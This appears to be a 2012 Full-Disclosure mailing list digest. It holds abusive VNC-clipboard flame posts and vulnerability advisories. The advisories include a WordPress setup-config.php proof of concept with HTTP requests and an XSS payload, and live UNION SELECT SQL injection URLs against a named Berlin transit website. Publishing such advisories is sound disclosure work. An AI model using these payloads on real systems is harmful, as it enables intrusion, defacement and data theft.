fuckoff you ragdoll... i dont troll, and many on this fucking list knows it... fuckit... i aint paying shit to anyone on this list, enjoy finding your 0days, and, the next admins, go ahead and rm me, coz i will be dropping your ass of a FD , until it makes me. go die, and, maybe, you wont have money, and then, maybe, you will have 10 wives, with 10 kids,. now go eat a burger. rat On 25 January 2012 21:38, Christian Sciberras uuf6...@gmail.com wrote: No, I only read the manual. Now go troll somwhere else. :) On Wed, Jan 25, 2012 at 11:35 AM, GloW - XD doo...@gmail.com wrote: Windows is even more secure, have you actually, read any of the code / On 25 January 2012 21:30, Christian Sciberras uuf6...@gmail.com wrote: That's not necessarily true. On windows you can add custom clipboard formats that would contain a 'link' to the original source, causing the data to be actually passed when pasting. An example of this is when one copy+pastes a file. See the Windows Clipboard API for more info. Chris. On Wed, Jan 25, 2012 at 10:54 AM, Mario Vilas mvi...@gmail.com wrote: I'm not sure how the clipboard works in Linux desktops (I understand it's a little different), but at least in Windows environments data has to be copied to the clipboard when you hit Ctrl-C. It can't be copied when you hit Ctrl-V because then the applications wouldn't know if there is anything to paste (like you said, the button would be grayed). So to replicate this behavior it's necessary to send the data as it's copied, not as it's pasted. Most (not all, but most) desktop systems assume clipboard data can be freely shared with all applications and don't have any kind of isolation at all. VNC was designed with the same idea. The bottom line is, the problem here is using VNC for what Ben is using it. There are many more problems with that scenario and clipboard sharing may be the least of them. On Wed, Jan 25, 2012 at 8:44 AM, Peter Osterberg j...@vel.nu wrote: On 01/24/2012 07:18 PM, Mario Vilas wrote: Guys, could you please read carefully everything before you reply? I read carefully. It still didn't make sense, though. And you wouldn't be allowed to use copypaste while you edit sensitive documents either, I guess? I don't know how you could get to such a conclusion from what I wrote. You're reporting that if you copy and paste sensitive information and connect to a VNC session your clipboard data gets sent to the remote machine. That's pretty obvious and not a security hole that needs to be plugged. I don't think that is what Ben is saying. The clipboard get sent to the the server even before it is pasted, this happens without the user knowing of it. Notepad would have the paste button grayed otherwise, if the clipboard is empty, right? So it is already on the server before paste is pressed. So what ever was in the clipboard buffer is transmitted to the server on connection. This is at least the assumption I make from reading Ben's mails. Or... Is there a cliboard flag saying there is something on the clipboard, but it isn't transmitted until the user actually pastes? I haven't really got any experience with how the clipboard feature is implemented. My assumption is however that it has to be on server for notepad to be aware that Paste shouldn't be grayed out... I think Ben's report make complete sense actually, it would be better to have the clipboard feature as a default. Security before features... =) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.” ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] VNC viewers: Clipboard of host automatically sent to remote machine
and stupidly, you forgot to addin the second PRIVT post i sent you, saying i meant *insecure :) now, go try tell me windows vnc is secure again...and, then setup a vnc on your box, and, under win32, try your best, when your ready, yell out, so i can make a compete fucking fool of ya. ok ? if this is how you want to play, i am challenging you, if i can own a shitty windows setup you 'secure' as best you8 can, here on fd, is this trolling is it ? its a challenge... maybe, if you read the lame rfb and, pixelisation via IP KVM, unfortunately for windows, it aint any different, a pixel is placed at X or Y, and, you can place data calls to it, from server wich, could be, my bot :) want more proof,...keep going with my challenge then. On 25 January 2012 21:38, Christian Sciberras uuf6...@gmail.com wrote: No, I only read the manual. Now go troll somwhere else. :) On Wed, Jan 25, 2012 at 11:35 AM, GloW - XD doo...@gmail.com wrote: Windows is even more secure, have you actually, read any of the code / On 25 January 2012 21:30, Christian Sciberras uuf6...@gmail.com wrote: That's not necessarily true. On windows you can add custom clipboard formats that would contain a 'link' to the original source, causing the data to be actually passed when pasting. An example of this is when one copy+pastes a file. See the Windows Clipboard API for more info. Chris. On Wed, Jan 25, 2012 at 10:54 AM, Mario Vilas mvi...@gmail.com wrote: I'm not sure how the clipboard works in Linux desktops (I understand it's a little different), but at least in Windows environments data has to be copied to the clipboard when you hit Ctrl-C. It can't be copied when you hit Ctrl-V because then the applications wouldn't know if there is anything to paste (like you said, the button would be grayed). So to replicate this behavior it's necessary to send the data as it's copied, not as it's pasted. Most (not all, but most) desktop systems assume clipboard data can be freely shared with all applications and don't have any kind of isolation at all. VNC was designed with the same idea. The bottom line is, the problem here is using VNC for what Ben is using it. There are many more problems with that scenario and clipboard sharing may be the least of them. On Wed, Jan 25, 2012 at 8:44 AM, Peter Osterberg j...@vel.nu wrote: On 01/24/2012 07:18 PM, Mario Vilas wrote: Guys, could you please read carefully everything before you reply? I read carefully. It still didn't make sense, though. And you wouldn't be allowed to use copypaste while you edit sensitive documents either, I guess? I don't know how you could get to such a conclusion from what I wrote. You're reporting that if you copy and paste sensitive information and connect to a VNC session your clipboard data gets sent to the remote machine. That's pretty obvious and not a security hole that needs to be plugged. I don't think that is what Ben is saying. The clipboard get sent to the the server even before it is pasted, this happens without the user knowing of it. Notepad would have the paste button grayed otherwise, if the clipboard is empty, right? So it is already on the server before paste is pressed. So what ever was in the clipboard buffer is transmitted to the server on connection. This is at least the assumption I make from reading Ben's mails. Or... Is there a cliboard flag saying there is something on the clipboard, but it isn't transmitted until the user actually pastes? I haven't really got any experience with how the clipboard feature is implemented. My assumption is however that it has to be on server for notepad to be aware that Paste shouldn't be grayed out... I think Ben's report make complete sense actually, it would be better to have the clipboard feature as a default. Security before features... =) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.” ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter:
Re: [Full-disclosure] Using HTTP referer for phishing attacks
yea yea, we got it now, ill say one thing to FD, your all putting, one really cool thing i was doing, to a halt. enjoy, ask zx2c4 about it. On 25 January 2012 21:09, Jerome Athias jer...@netpeas.com wrote: This could be also used in some cases to Refer requests from paypal or such payment systems when there is no/bad validation checks on an e-commerce website. ie: if(Referer.Contains(paypal.com)) { ok } but what if i control mypaypal.com? Le 24/01/2012 20:14, Jan Wrobel a écrit : Hi, Sorry if this is not new, but I didn't manage to find any mention of such a technique. In short: HTTP referer field contains information where the web user is coming from, which is often a trusted site such as a web search. Having such information, a malicious web site can use several tricks to fool the user into thinking that he or she returned to the referring site. In fact, the user is taken to a generic phishing site that intercepts all data exchanged between the user, the referring site and sites visited from the referring site. More detailed write up with few examples is here: http://mixedbit.org/referer.html Cheers, Jan ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Jerome Athias - NETpeas VP, Director of Software Engineer Palo Alto - Paris - Casablanca www.netpeas.com - Stay updated on Security: www.vulnerabilitydatabase.com The computer security is an art form. It's the ultimate martial art. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] VNC viewers: Clipboard of host automatically sent to remote machine
For the record... who are the other 'many on this list' that know you don't troll other than your alter egos? 'course you don't troll can you quote me where I ever said VNC is secure? With that, I'll let you troll in peace. I have no interest talking to you anyway... :) On Wed, Jan 25, 2012 at 12:04 PM, GloW - XD doo...@gmail.com wrote: and stupidly, you forgot to addin the second PRIVT post i sent you, saying i meant *insecure :) now, go try tell me windows vnc is secure again...and, then setup a vnc on your box, and, under win32, try your best, when your ready, yell out, so i can make a compete fucking fool of ya. ok ? if this is how you want to play, i am challenging you, if i can own a shitty windows setup you 'secure' as best you8 can, here on fd, is this trolling is it ? its a challenge... maybe, if you read the lame rfb and, pixelisation via IP KVM, unfortunately for windows, it aint any different, a pixel is placed at X or Y, and, you can place data calls to it, from server wich, could be, my bot :) want more proof,...keep going with my challenge then. On 25 January 2012 21:38, Christian Sciberras uuf6...@gmail.com wrote: No, I only read the manual. Now go troll somwhere else. :) On Wed, Jan 25, 2012 at 11:35 AM, GloW - XD doo...@gmail.com wrote: Windows is even more secure, have you actually, read any of the code / On 25 January 2012 21:30, Christian Sciberras uuf6...@gmail.com wrote: That's not necessarily true. On windows you can add custom clipboard formats that would contain a 'link' to the original source, causing the data to be actually passed when pasting. An example of this is when one copy+pastes a file. See the Windows Clipboard API for more info. Chris. On Wed, Jan 25, 2012 at 10:54 AM, Mario Vilas mvi...@gmail.com wrote: I'm not sure how the clipboard works in Linux desktops (I understand it's a little different), but at least in Windows environments data has to be copied to the clipboard when you hit Ctrl-C. It can't be copied when you hit Ctrl-V because then the applications wouldn't know if there is anything to paste (like you said, the button would be grayed). So to replicate this behavior it's necessary to send the data as it's copied, not as it's pasted. Most (not all, but most) desktop systems assume clipboard data can be freely shared with all applications and don't have any kind of isolation at all. VNC was designed with the same idea. The bottom line is, the problem here is using VNC for what Ben is using it. There are many more problems with that scenario and clipboard sharing may be the least of them. On Wed, Jan 25, 2012 at 8:44 AM, Peter Osterberg j...@vel.nu wrote: On 01/24/2012 07:18 PM, Mario Vilas wrote: Guys, could you please read carefully everything before you reply? I read carefully. It still didn't make sense, though. And you wouldn't be allowed to use copypaste while you edit sensitive documents either, I guess? I don't know how you could get to such a conclusion from what I wrote. You're reporting that if you copy and paste sensitive information and connect to a VNC session your clipboard data gets sent to the remote machine. That's pretty obvious and not a security hole that needs to be plugged. I don't think that is what Ben is saying. The clipboard get sent to the the server even before it is pasted, this happens without the user knowing of it. Notepad would have the paste button grayed otherwise, if the clipboard is empty, right? So it is already on the server before paste is pressed. So what ever was in the clipboard buffer is transmitted to the server on connection. This is at least the assumption I make from reading Ben's mails. Or... Is there a cliboard flag saying there is something on the clipboard, but it isn't transmitted until the user actually pastes? I haven't really got any experience with how the clipboard feature is implemented. My assumption is however that it has to be on server for notepad to be aware that Paste shouldn't be grayed out... I think Ben's report make complete sense actually, it would be better to have the clipboard feature as a default. Security before features... =) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.” ___ Full-Disclosure - We
Re: [Full-disclosure] TWSL2012-002: Multiple Vulnerabilities in WordPress
The vendor was notified. They have chosen not to fix the issue at this time. The Vendor Response section has the details: Vendor Response: Due to the fact that the component in question is an installation script, the vendor has stated that the attack surface is too small to warrant a fix: We give priority to a better user experience at the install process. It is unlikely a user would go to the trouble of installing a copy of WordPress and then not finishing the setup process more-or-less immediately. The window of opportunity for exploiting such a vulnerability is very small. However, Trustwave SpiderLabs urges caution in situations where the WordPress installation script is provided as part of a default image. This is often done as a convenience on hosting providers, even in cases where the client does not use the software. It is a best practice to ensure that no installation scripts are exposed to outsiders, and these vulnerabilities reinforce the importance of this step. -Original Message- From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Henri Salo Sent: Tuesday, January 24, 2012 5:48 PM To: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] TWSL2012-002: Multiple Vulnerabilities in WordPress On Tue, Jan 24, 2012 at 04:09:16PM -0600, Trustwave Advisories wrote: Trustwave's SpiderLabs Security Advisory TWSL2012-002: Multiple Vulnerabilities in WordPress https://www.trustwave.com/spiderlabs/advisories/TWSL2012-002.txt Published: 1/24/12 Version: 1.0 Vendor: WordPress (http://wordpress.org/) Product: WordPress Version affected: 3.3.1 and prior Product description: WordPress is a free and open source blogging tool and publishing platform powered by PHP and MySQL. Credit: Jonathan Claudius of Trustwave SpiderLabs Finding 1: PHP Code Execution and Persistent Cross Site Scripting Vulnerabilities via 'setup-config.php' page. CVE: CVE-2011-4899 The WordPress 'setup-config.php' installation page allows users to install WordPress in local or remote MySQL databases. This typically requires a user to have valid MySQL credentials to complete. However, a malicious user can host their own MySQL database server and can successfully complete the WordPress installation without having valid credentials on the target system. After the successful installation of WordPress, a malicious user can inject malicious PHP code via the WordPress Themes editor. In addition, with control of the database store, malicious Javascript can be injected into the content of WordPress yielding persistent Cross Site Scripting. Proof of Concept: Servers Involved A.B.C.D = Target WordPress Web Server W.X.Y.Z = Malicious User's MySQL Instance 1.) Malicious User hosts their own MySQL instance at W.X.Y.Z on port 3306 2.) Performs POST/GET Requests to Install WordPress into MySQL Instance Request #1 -- POST /wp-admin/setup-config.php?step=2 HTTP/1.1 Host: A.B.C.D User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Proxy-Connection: keep-alive Referer: http://A.B.C.D/wp-admin/setup-config.php?step=1 Cookie: wp-settings-time-1=1322687480; wp-settings-1=m9%3Do Content-Type: application/x-www-form-urlencoded Content-Length: 81 dbname=wordpressuname=jsmithpwd=jsmithdbhost=W.X.Y.Zprefix=wp_sub mit=Submit Request #2 -- GET /wp-admin/install.php HTTP/1.1 Host: A.B.C.D User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Proxy-Connection: keep-alive Referer: http://A.B.C.D/wp-admin/setup-config.php?step=2 Cookie: wp-settings-time-1=1322687480; wp-settings-1=m9%3Do If-Modified-Since: Wed, 07 Dec 2011 16:03:33 GMT 3.) Get PHP Code Execution Malicious user edits 404.php via Themes Editor as follows: ?php phpinfo(); ? Note #1: Any php file in the theme could be used. Note #2: Depending settings, PHP may be used to execute system commands on webserver. Malicious user performs get request of modified page to execute code. Request --- GET /wp-content/themes/default/404.php HTTP/1.1 Host: A.B.C.D User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1 4.) Get Persistent Cross Site Scripting Malicious User Injects Malicious Javascript into their own MySQL database instance MySQL Query --- update wp_comments SET comment_content='scriptalert('123')/script' where comment_content='Hi, this is a comment.br /To delete \ a comment, just log in
Re: [Full-disclosure] TWSL2012-002: Multiple Vulnerabilities in WordPress
On Wed, Jan 25, 2012 at 08:43:34AM -0600, Trustwave Advisories wrote: The vendor was notified. They have chosen not to fix the issue at this time. The Vendor Response section has the details: Vendor Response: Due to the fact that the component in question is an installation script, the vendor has stated that the attack surface is too small to warrant a fix: We give priority to a better user experience at the install process. It is unlikely a user would go to the trouble of installing a copy of WordPress and then not finishing the setup process more-or-less immediately. The window of opportunity for exploiting such a vulnerability is very small. However, Trustwave SpiderLabs urges caution in situations where the WordPress installation script is provided as part of a default image. This is often done as a convenience on hosting providers, even in cases where the client does not use the software. It is a best practice to ensure that no installation scripts are exposed to outsiders, and these vulnerabilities reinforce the importance of this step. There is A LOT of these open installation pages in the Internet. It is not uncommon to leave those open by accident. Some people also do this, because they just don't understand the risks. I am wondering if WordPress would apply patch if we create one as a collaborative effort. I would be more than happy to help creating a patch for this if this is the case. - Henri Salo ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] TWSL2012-002: Multiple Vulnerabilities in WordPress
On Wednesday 25 Jan 2012 15:22:39 Henri Salo wrote: There is A LOT of these open installation pages in the Internet. It is not uncommon to leave those open by accident. Some people also do this, because they just don't understand the risks. I am wondering if WordPress would apply patch if we create one as a collaborative effort. I would be more than happy to help creating a patch for this if this is the case. I may have missed something, but does simply having the file exposed make you vulnerable. From looking at it, it starts of with a bunch of file_exists(), which essentially evaluate if you've installed or not and wp_die() if you have. Tim -- Tim Brown mailto:t...@65535.com signature.asc Description: This is a digitally signed message part. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] TWSL2012-002: Multiple Vulnerabilities in WordPress
Dear full-disclosure I wrote to you to tell you about serious serious vulnerability in all Windows versions. If you turn machine on before system is configured, then you be able to set user password yourself, big gaping hole I make big large botnet to fully utilise this impressive vulnerability! thegrugq said i could sell this for liike 3 ferrari's and 1 russian wife, i say nay though! Big time russian mobster offer me diamond, i say nay! I like report vuln of this size responsibility in so hope to make more money^H^H^H^H^H^H^Hsecure world. Please full-disclosure, this vuln is serious and i plead you shut down all windows now. I wrote metasploit module! It find new installs turned off machine, WOL and i go to house and enter password! FULL SYSTEM OWNED! Big botnets! Many wifes! On Wed, Jan 25, 2012 at 2:49 PM, Tim Brown t...@65535.com wrote: On Wednesday 25 Jan 2012 15:22:39 Henri Salo wrote: There is A LOT of these open installation pages in the Internet. It is not uncommon to leave those open by accident. Some people also do this, because they just don't understand the risks. I am wondering if WordPress would apply patch if we create one as a collaborative effort. I would be more than happy to help creating a patch for this if this is the case. I may have missed something, but does simply having the file exposed make you vulnerable. From looking at it, it starts of with a bunch of file_exists(), which essentially evaluate if you've installed or not and wp_die() if you have. Tim -- Tim Brown mailto:t...@65535.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] TWSL2012-002: Multiple Vulnerabilities in WordPress
Yes it does. wp-admin/setup-config.php?step=1 on any wp install where it exists gives this: The file 'wp-config.php' already exists one level above your WordPress installation. If you need to reset any of the configuration items in this file, please delete it first. On Wed, Jan 25, 2012 at 4:11 PM, Julius Kivimäki julius.kivim...@gmail.comwrote: Funny but no, this does not need a non-installed wordpress. 2012/1/25 Benji m...@b3nji.com Dear full-disclosure I wrote to you to tell you about serious serious vulnerability in all Windows versions. If you turn machine on before system is configured, then you be able to set user password yourself, big gaping hole I make big large botnet to fully utilise this impressive vulnerability! thegrugq said i could sell this for liike 3 ferrari's and 1 russian wife, i say nay though! Big time russian mobster offer me diamond, i say nay! I like report vuln of this size responsibility in so hope to make more money^H^H^H^H^H^H^Hsecure world. Please full-disclosure, this vuln is serious and i plead you shut down all windows now. I wrote metasploit module! It find new installs turned off machine, WOL and i go to house and enter password! FULL SYSTEM OWNED! Big botnets! Many wifes! On Wed, Jan 25, 2012 at 2:49 PM, Tim Brown t...@65535.com wrote: On Wednesday 25 Jan 2012 15:22:39 Henri Salo wrote: There is A LOT of these open installation pages in the Internet. It is not uncommon to leave those open by accident. Some people also do this, because they just don't understand the risks. I am wondering if WordPress would apply patch if we create one as a collaborative effort. I would be more than happy to help creating a patch for this if this is the case. I may have missed something, but does simply having the file exposed make you vulnerable. From looking at it, it starts of with a bunch of file_exists(), which essentially evaluate if you've installed or not and wp_die() if you have. Tim -- Tim Brown mailto:t...@65535.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] ZDI-12-018 : Symantec PCAnywhere awhost32 Remote Code Execution Vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ZDI-12-018 : Symantec PCAnywhere awhost32 Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-12-018 January 25, 2012 - -- CVE ID: CVE-2011-3478 - -- CVSS: 9.7, AV:N/AC:L/Au:N/C:C/I:C/A:P - -- Affected Vendors: Symantec - -- Affected Products: Symantec PCAnywhere - -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Symantec PCAnywhere. Authentication is not required to exploit this vulnerability. The flaw exists within the awhost32 component which is used when handling incoming connections. This process listens on TCP port 5631. When handling an authentication request the process copies the user supplied username unsafely to a fixed-length buffer of size 0x108. A remote attacker can exploit this vulnerability to execute arbitrary code under the context of the SYSTEM account. - -- Vendor Response: Symantec has issued an update to correct this vulnerability. More details can be found at: http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisorypvid=security_advisoryyear=2012suid=20120124_00 - -- Disclosure Timeline: 2011-08-16 - Vulnerability reported to vendor 2012-01-25 - Coordinated public release of advisory - -- Credit: This vulnerability was discovered by: * Tal zeltzer - -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi -BEGIN PGP SIGNATURE- Version: GnuPG v2.0.17 (MingW32) iQEcBAEBAgAGBQJPIDzmAAoJEFVtgMGTo1sc8JMH/igeFTAAKEKBJvPDSxtDHAco igTaHQTmTrEYZ7PYnLp58MKaFolOmEbyjYN0iQbR973o4wC1XFqDfdC8Cb2Hfaw4 aSl5geromYH6ORB+Xd3jdVcIBa/EdzyTr3UYBEeGpdtLVu6lfRV2C6mJk1avstcm hRC7epSxHSsEav0rEYXOp/8LSpD6tSqZPQssMhVDsyLrSGWyg7T0YtcICh2J8QsT FSk9ul3sLWew2n2fLsQgVa11VMWarybI9PPsmGChA6I0i88B0bzINtgvQXHU4LfN pWg2APvw426ulFOBQQaBLwsFiwaqFysrN+0GA4PUi/R7uW5K+Pkf8YVylC4+LpY= =DnOQ -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] VNC viewers: Clipboard of host automatically sent to remote machine
On Wed, Jan 25, 2012 at 2:55 AM, Ben Bucksch n...@bucksch.org wrote: Dear coderman, posting mails that were explicitly marked offlist on the public list is no-go. you must be new around here... why not let everyone learn from your fail? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] VNC viewers: Clipboard of host automatically sent to remote machine
What was the offlist message he was referring to? Cause yeah, he sounds pretty new here with that kind of message. People bring in outside conversations all the time, especially if they feel it is relevant to the topic at hand. Speaking of the topic at hand: I agree with the crowd that says it is not explicitly a security bug, but more like a lack of a good feature. It should be off by default, and someone on the list already made a patch to remove the clipboard which you shouldn't be using for sensitive information while connected to untrustworthy computers anyways. The developers should be notified that they need the feature to turn clipboard sharing off, but if they don't choose a different vnc and be on your way. I don't view it as a security bug because its policy bug. It's not something where this problem exists ergo I can exploit it, its a problem where if they do something stupid, I can take advantage of it, and oh hey their client by default doesn't mitigate this. And before someone yells at me for how I seperate software bugs and policy bugs by pointing out something like a client side attack: I view such things as a mix. Policy bug that they are falling for it, and software bug for the actual exploit. And really this is a good example of a situation where if you are worried about this you have bigger problems. Why must you use vnc? Why is what you're connecting to untrustworthy? What information is directly at risk if the box you're connecting to is compromised? What information is indirectly at risk? Does the box running suspicious programs have access to the internet? Etc. Once you start going down the list on things that should be done, the need to worry about this kind of bug becomes less and less relevant. Meaning if this kind of problem IS relevant then I would almost bet money that you are doing other things really wrong and so an attacker or a bad app doesn't need to use this because they got far more easier and more rewarding things to try. On Jan 25, 2012 9:45 AM, coderman coder...@gmail.com wrote: On Wed, Jan 25, 2012 at 2:55 AM, Ben Bucksch n...@bucksch.org wrote: Dear coderman, posting mails that were explicitly marked offlist on the public list is no-go. you must be new around here... why not let everyone learn from your fail? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Verkehrsbetriebe Berlin - SQL Injection Vulnerability
Title: == Verkehrsbetriebe Berlin - SQL Injection Vulnerability Date: = 2012-01-25 References: === http://www.vulnerability-lab.com/get_content.php?id=138 VL-ID: = 138 Introduction: = VBB Verkehrsverbund Berlin-Brandenburg GmbH Der VBB koordiniert die Interessen der verschiedenen Partner und gestaltet die Entwicklung eines leistungsstarken integrierten Nahverkehrssystems in Berlin. (Copy of the Vendors Homepage: http://www.vbbonline.de/) Abstract: = An anonymous researcher discovered a critical SQL Injection Vulnerability on Berlins VBB Verkehrsbetriebe. Report-Timeline: 2011-02-09: Vendor Notification 1 2011-03-06: Vendor Notification 2 2011-04-13: Vendor Notification 3 2012-01-25: Vendor Response/Feedback 2012-01-25: Vendor Fix/Patch 2012-01-25: Public or Non-Public Disclosure Status: Published Affected Products: == Exploitation-Technique: === Remote Severity: = Critical Details: A critical SQL Injection Vulnerability is detected on VBBs Verkehrsverbund Berlin-Brandenburg GmbH Website. The vulnerability allows remote attackers to inject own sql statements on the affected application/dbms. The successfull exploitation can result in website defacements, data lost, manipulation of content module destruction. Vulnerable Modules: [+] Language ID Pictures: ../sql1.png ../sql2.png Proof of Concept: = The vulnerability can be exploited by remote attackers without user inter action. For demonstration or reproduce ... File: index.php Para: ?cat=2sCat=392id_language= References: http://www.vbbonline.de/index.php?cat=2sCat=392id_language=-1 union select 1,2,3,4,5,version()/* http://www.vbbonline.de/index.php?cat=2sCat=392id_language=-1%20union%20select%201,2,3,4,5,database%28%29/* Reference(s): http://www.vbbonline.de/intern/static/index.php Risk: = The security risk of the sql injection vulnerability is estimated as critical. Credits: Vulnerability Research Laboratory - Benjamin Kunz MejriPim J.F.P. Campers Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability- Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers. Copyright © 2012|Vulnerability-Lab -- Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com Contact: ad...@vulnerability-lab.com or supp...@vulnerability-lab.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Acolyte CMS v1.5 and v6.3 - SQL Injection Vulnerabilities
Title: == Acolyte CMS v1.5 and v6.3 - SQL Injection Vulnerabilities Date: = 2012-01-25 References: === http://www.vulnerability-lab.com/get_content.php?id=397 VL-ID: = 397 Abstract: = A Vulnerability Laboratory researcher discovered a critical (remote) SQL Injection and a persistent XSS on the Acolyte CMS v1.5.3 and v1.6.3. Report-Timeline: 2012-01-25: Public or Non-Public Disclosure Status: Published Exploitation-Technique: === Remote Severity: = High Details: 1.1 A SQL Injection vulnerability is detected on the powered by Acolyte v1.5 v6.3 CMS. The vulnerability allows an remote attacker to execute sql commands via remote sql injection attack. The bug is located on the news_comments plugin_forum module of the content management system. Successful exploitation of the vulnerability allows remote attacker to compromise the application dbms. Vulnerable Module(s): (v1.5.3) [+] ?c=pluginplugin=forums [+] ?c=news_comments Vulnerable Module(s): (v1.6.3) [+] ?c=news_comments [+] ?c=forum_post 1.2 A persistent input validation vulnerability is detected on the powered by Acolyte v1.5 v6.3 CMS. The vulnerability allows an remote attacker to hijack customer sessions via application side attack. Successful exploitation with required user inter action allows an attacker to manipulate the web context requests of the vulnerable application module. Vulnerable Module(s): (v1.6.3 v1.5.3) [+] ?c=pluginplugin=forums Proof of Concept: = The vulnerabilities can be exploited by remote attacker. For demonstration or reproduce ... 1.1 v1.5.3 ?c=pluginplugin=forums2=topicss=[vuln] ?c=pluginplugin=forums2=posts=3t=[vuln] ?c=news_commentscid=[vuln] v1.6.3 ?c=forum_posts=3t=[vuln] ?c=forum_posts=[vuln] ?c=news_commentscid=[vuln] 1.2 ?c=pluginplugin=forums2=search 